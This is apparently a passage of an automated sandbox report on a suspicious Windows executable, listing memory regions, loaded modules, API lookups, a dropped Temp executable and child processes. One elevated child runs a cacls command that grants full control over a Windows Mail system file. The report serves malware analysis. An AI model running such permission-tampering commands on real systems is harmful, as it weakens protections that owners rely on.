- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x75160000 | 0x7521dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x753b0000 | 0x753f3fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75430000 | 0x767eefff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x76810000 | 0x7681efff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77340000 | 0x773ccfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x773f0000 | 0x778ccfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77c30000 | 0x77c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75260000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x76a10000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x75160000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77000000 |
|
1 | |
| Load | USER32.dll | base_address = 0x77150000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x748e0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x752860c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75286110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x752787e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75285f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75284a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75285fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7527a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7527c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75286300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75279a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x752861b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7527fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77cf4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75279a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x752779b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7527fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x752792b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7527a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75286180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75283a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75278cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75285f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75272af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x752778f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75272db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75272da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75277a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7527a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75279660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7527a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7527a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x752787c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75278840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75277940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75279560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x752869c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75286390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x752a1c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x752868e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75286920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75286540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77ce5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77ce5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x752a26a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77cdda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77cff190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77cfa200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x752874f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75279fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75272d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x752775a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x752725e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75286870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x752868c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75286900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75279700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75271b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77d02570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75277920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77cf9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x752862a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75286590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75286860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75279680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x752864a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7527a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x752a28e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7527a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75286020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x752777b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7527fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75279a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75271ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75271da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75279930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7527a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75278770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7527fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75279fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75277910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75279a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75272dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75271d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75272b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7527a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7527a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77cdbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x752864f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x76a2ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x76a2fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x76a295e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x76a30680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x76a2ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x76a2f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x76a2ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x76a2ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x76a2f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x76a306c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x76a2efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x76a2f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x7516c6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x770aee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x770855a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x770857e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x77089590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x77080820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x770afbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x771638f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x7717b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x7717b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x77167740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x771774e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x7717efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x77184ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x77174580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x77171540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x748e1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x748e1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x748e1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7527a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7527f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75277580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75279910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75286030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75285f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75285ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7527a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7527a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77cd40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77ccd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77ccecf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75285720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77cce140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77cceb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77d09990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77d05540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77cf9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7527a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x752a0a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74fa0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7527f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7527fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x752a1030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7527a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x752a14b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7527a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x752a16f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75279970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f23c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75278710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x752796e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-09 19:48:25 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #192: backgroundtaskhost.exe
0
0
| Information | Value |
|---|---|
| ID | #192 |
| File Name | c:\windows\system32\backgroundtaskhost.exe |
| Command Line | "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca |
| Initial Working Directory | C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\ |
| Monitor | Start Time: 00:03:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:15, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x16c |
| Parent PID | 0x248 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Low |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A64
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x0000000e22cb0000 | 0xe22cb0000 | 0xe22ccffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000e22cd0000 | 0xe22cd0000 | 0xe22ce3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000e22cf0000 | 0xe22cf0000 | 0xe22d6ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000e22d70000 | 0xe22d70000 | 0xe22d73fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000e22d80000 | 0xe22d80000 | 0xe22d81fff | Private Memory | rw |
|
|
|
- |
| s-1-5-21-1462094071-1423818996-289466292-1000.pckgdep | 0xe22d90000 | 0xe22d90fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00007df5ff070000 | 0x7df5ff070000 | 0x7ff5ff06ffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x00007ff655430000 | 0x7ff655430000 | 0x7ff655452fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff655455000 | 0x7ff655455000 | 0x7ff655455fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff65545e000 | 0x7ff65545e000 | 0x7ff65545ffff | Private Memory | rw |
|
|
|
- |
| backgroundtaskhost.exe | 0x7ff6560e0000 | 0x7ff6560e6fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
Process #193: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #193 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:15, Reason: Child Process |
| Unmonitor | End Time: 00:03:19, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x9e4 |
| Parent PID | 0xf08 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
6BC
0x
CC4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000000f0000 | 0x000f0000 | 0x0010ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000000f0000 | 0x000f0000 | 0x000fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x00103fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x00111fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x00113fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000120000 | 0x00120000 | 0x00133fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000140000 | 0x00140000 | 0x0017ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x001bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001c0000 | 0x001c0000 | 0x001c3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001d0000 | 0x001d0000 | 0x001d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x001e1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001f0000 | 0x002adfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x002b0000 | 0x002b1fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x002effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x005bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x0032ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000330000 | 0x00330000 | 0x0036ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004c0000 | 0x004c0000 | 0x005bffff | Private Memory | rw |
|
|
|
- |
| cacls.exe | 0x00830000 | 0x00839fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000840000 | 0x00840000 | 0x0483ffff | Pagefile Backed Memory | - |
|
|
|
- |
| sortdefault.nls | 0x04840000 | 0x04b76fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x748a0000 | 0x748c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
